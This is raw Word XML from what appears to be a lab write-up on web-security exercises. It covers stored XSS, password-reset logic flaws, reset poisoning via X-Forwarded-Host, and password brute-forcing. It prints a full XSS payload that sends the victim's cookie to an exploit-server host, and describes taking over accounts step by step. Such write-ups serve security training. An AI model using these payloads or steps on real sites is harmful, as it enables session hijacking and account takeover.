          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FA5A8D" w:rsidRPr="00FA5A8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FA5A8D" w:rsidRPr="00FA5A8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>='//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="006B311B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the comment input field in order to steal the victim’s cookie </w:t>
      </w:r>
      <w:r w:rsidR="00D479FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">then whenever the user opens the page it will send the cookie to me and then I will decode and use it to login into the </w:t>
      </w:r>
      <w:r w:rsidR="003A167A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A37CE23" w14:textId="61C5C413" w:rsidR="001A7FB5" w:rsidRDefault="006A7894" w:rsidP="001A7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7894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Password reset broken logic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909D8C0" w14:textId="35087184" w:rsidR="006A7894" w:rsidRDefault="006A7894" w:rsidP="006A78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Exploited this vulnerability as the </w:t>
      </w:r>
      <w:r w:rsidR="00BF163B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="004628DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> reset link has the token in its URL as well as in its HTTP request and we noticed that </w:t>
      </w:r>
      <w:r w:rsidR="00485BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>it doesn’t check the token while submitting the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F71613" w14:textId="29FE8244" w:rsidR="00485BCD" w:rsidRDefault="00485BCD" w:rsidP="006A78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after deleting the token value </w:t>
      </w:r>
      <w:r w:rsidR="001A69E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and changing the username to the target’s username we’re able to change </w:t>
      </w:r>
      <w:r w:rsidR="00D81D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>its password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530084A0" w14:textId="375E0B23" w:rsidR="00926E0F" w:rsidRDefault="004E20A7" w:rsidP="0092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20A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Password reset poisoning via middleware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BE15844" w14:textId="64CB81FE" w:rsidR="004E20A7" w:rsidRDefault="00653965" w:rsidP="004E20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Exploited the vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="007625C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a middleware exploit server by using </w:t>
      </w:r>
      <w:r w:rsidR="007625C6" w:rsidRPr="007625C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="007625C6" w:rsidRPr="007625C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007625C6" w:rsidRPr="007625C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Forwarded</w:t>
      </w:r>
      <w:r w:rsidR="007625C6" w:rsidRPr="007625C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007625C6" w:rsidRPr="007625C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Host:</w:t>
      </w:r>
      <w:r w:rsidR="007625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B07AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>header in the HTTP request to sen</w:t>
      </w:r>
      <w:r w:rsidR="007C7E49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00CB07AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the request dynamically to my server and got the temporary token of victim from there and then created a request to reset password</w:t>
      </w:r>
      <w:r w:rsidR="00012875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> for my account and after opening URL I changed the URL’s token to victim’s token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52F191" w14:textId="726CA5F5" w:rsidR="003D0B64" w:rsidRDefault="003D0B64" w:rsidP="00CE0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D0B64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Password brute-force via password change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24DAEF5" w14:textId="5497E35E" w:rsidR="00CE0454" w:rsidRDefault="00CE0454" w:rsidP="00CE04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case we can see that </w:t>
      </w:r>
      <w:r w:rsidR="00F862B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">after logging in when we try to change our password and after two wrong current password </w:t>
      </w:r>
      <w:r w:rsidR="0062398A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>attempts,</w:t>
      </w:r>
      <w:r w:rsidR="00F862B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we get logged out </w:t>
      </w:r>
      <w:r w:rsidR="005258CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">automatically but when </w:t>
      </w:r>
      <w:r w:rsidR="00B3729A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">we try to enter </w:t>
      </w:r>
      <w:r w:rsidR="0062398A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>correct</w:t>
      </w:r>
      <w:r w:rsidR="00B3729A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> current password</w:t>
      </w:r>
      <w:r w:rsidR="0062398A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> with unmatched new password</w:t>
      </w:r>
      <w:r w:rsidR="0046444C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> then we will get an error saying that the new passwords didn’t match which means that the current password is correct</w:t>
      </w:r>
      <w:r w:rsidR="00B01ED7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C49098" w14:textId="5F1F0216" w:rsidR="00595E1E" w:rsidRPr="005D196C" w:rsidRDefault="00B01ED7" w:rsidP="005D19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So, we will mount a brute force attack on the current password and change the username to the target’s username</w:t>
      </w:r>
      <w:r w:rsidR="00DE020C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and as soon as we get an error saying that </w:t>
      </w:r>
      <w:r w:rsidR="00595E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:r w:rsidR="00DE020C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> didn’t </w:t>
      </w:r>
      <w:r w:rsidR="005D196C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>match,</w:t>
      </w:r>
      <w:r w:rsidR="00DE020C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we got the credentials.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00595E1E" w:rsidRPr="005D196C" w:rsidSect="00511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96AE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A2E5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C4"/>
    <w:rsid w:val="00012875"/>
    <w:rsid w:val="0003022F"/>
    <w:rsid w:val="000543AE"/>
    <w:rsid w:val="00055836"/>
    <w:rsid w:val="00076A86"/>
    <w:rsid w:val="00090622"/>
    <w:rsid w:val="000C71DF"/>
    <w:rsid w:val="000E1C61"/>
    <w:rsid w:val="000E1FC7"/>
    <w:rsid w:val="00145B43"/>
    <w:rsid w:val="00176789"/>
    <w:rsid w:val="0019366C"/>
    <w:rsid w:val="001A675E"/>
    <w:rsid w:val="001A69E1"/>
    <w:rsid w:val="001A7D97"/>
    <w:rsid w:val="001A7FB5"/>
    <w:rsid w:val="001C258F"/>
    <w:rsid w:val="001D5B34"/>
    <w:rsid w:val="001D7032"/>
    <w:rsid w:val="002014C0"/>
    <w:rsid w:val="002020F0"/>
    <w:rsid w:val="002112B7"/>
    <w:rsid w:val="002377D6"/>
    <w:rsid w:val="00255705"/>
    <w:rsid w:val="00265065"/>
    <w:rsid w:val="0027015F"/>
    <w:rsid w:val="00273FC9"/>
    <w:rsid w:val="002D3248"/>
    <w:rsid w:val="002F0EAE"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003514D8"/>
    <w:rsid w:val="003553AA"/>
    <w:rsid w:val="00370C45"/>
    <w:rsid w:val="00373D30"/>
    <w:rsid w:val="00392519"/>
    <w:rsid w:val="003A167A"/>
    <w:rsid w:val="003D0B64"/>
    <w:rsid w:val="003E039C"/>
    <w:rsid w:val="00425549"/>
    <w:rsid w:val="00427851"/>
    <w:rsid w:val="00441625"/>
    <w:rsid w:val="004628DB"/>
    <w:rsid w:val="0046444C"/>
    <w:rsid w:val="00485BCD"/>
    <w:rsid w:val="00487EBD"/>
    <w:rsid w:val="004A69CD"/>
    <w:rsid w:val="004C3D6C"/>
    <w:rsid w:val="004E20A7"/>
    <w:rsid w:val="00506D28"/>
    <w:rsid w:val="005115F7"/>
    <w:rsid w:val="005258CD"/>
    <w:rsid w:val="00557FB6"/>
    <w:rsid w:val="00595E1E"/>
    <w:rsid w:val="005A561F"/>
    <w:rsid w:val="005D196C"/>
    <w:rsid w:val="005D6B08"/>
    <w:rsid w:val="00605FE8"/>
    <w:rsid w:val="0062398A"/>
    <w:rsid w:val="00653965"/>
    <w:rsid w:val="006551F1"/>
    <w:rsid w:val="00680EA3"/>
    <w:rsid w:val="00697CC6"/>
    <w:rsid w:val="006A7894"/>
    <w:rsid w:val="006B311B"/>
    <w:rsid w:val="006E18E1"/>
    <w:rsid w:val="00710BD3"/>
    <w:rsid w:val="0073104A"/>
    <w:rsid w:val="007625C6"/>
    <w:rsid w:val="0079426E"/>
    <w:rsid w:val="007C7E49"/>
    <w:rsid w:val="007D286C"/>
    <w:rsid w:val="007D62DB"/>
    <w:rsid w:val="00802F05"/>
    <w:rsid w:val="00814DBC"/>
    <w:rsid w:val="008B661A"/>
    <w:rsid w:val="00926E0F"/>
    <w:rsid w:val="00934325"/>
    <w:rsid w:val="00952B96"/>
    <w:rsid w:val="009A78CE"/>
    <w:rsid w:val="009D642C"/>
    <w:rsid w:val="00A05FFB"/>
    <w:rsid w:val="00A169EF"/>
    <w:rsid w:val="00A312B4"/>
    <w:rsid w:val="00A57396"/>
    <w:rsid w:val="00A725D9"/>
    <w:rsid w:val="00A92CB6"/>
    <w:rsid w:val="00AC6D60"/>
    <w:rsid w:val="00B01ED7"/>
    <w:rsid w:val="00B068C7"/>
    <w:rsid w:val="00B10E77"/>
    <w:rsid w:val="00B21F24"/>
    <w:rsid w:val="00B31415"/>
    <w:rsid w:val="00B3729A"/>
    <w:rsid w:val="00B958C4"/>
    <w:rsid w:val="00BB3468"/>
    <w:rsid w:val="00BB4CB3"/>
    <w:rsid w:val="00BF163B"/>
    <w:rsid w:val="00C014B5"/>
    <w:rsid w:val="00C13191"/>
    <w:rsid w:val="00C15233"/>
    <w:rsid w:val="00C31EB9"/>
    <w:rsid w:val="00C42695"/>
    <w:rsid w:val="00C8071A"/>
    <w:rsid w:val="00CB07AD"/>
    <w:rsid w:val="00CC1D82"/>
    <w:rsid w:val="00CC6B84"/>
    <w:rsid w:val="00CD34BC"/>
    <w:rsid w:val="00CE0454"/>
    <w:rsid w:val="00D17F13"/>
    <w:rsid w:val="00D35C72"/>
    <w:rsid w:val="00D45636"/>
    <w:rsid w:val="00D479FF"/>
    <w:rsid w:val="00D81D9A"/>
    <w:rsid w:val="00D87957"/>
    <w:rsid w:val="00D90AC6"/>
    <w:rsid w:val="00DE020C"/>
    <w:rsid w:val="00DF1902"/>
    <w:rsid w:val="00E2032F"/>
    <w:rsid w:val="00E26BF8"/>
    <w:rsid w:val="00E647FA"/>
    <w:rsid w:val="00E70976"/>
    <w:rsid w:val="00EA1D15"/>
    <w:rsid w:val="00EB2DE2"/>
    <w:rsid w:val="00ED73EE"/>
    <w:rsid w:val="00EF3B42"/>
    <w:rsid w:val="00F1435B"/>
    <w:rsid w:val="00F43A01"/>
    <w:rsid w:val="00F625D4"/>
    <w:rsid w:val="00F862B2"/>
    <w:rsid w:val="00F86F73"/>
    <w:rsid w:val="00FA5A8D"/>
    <w:rsid w:val="00F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35D6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1D9E5A1C-1CC5-4432-9616-82101079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4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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-05T07:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-05T07:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>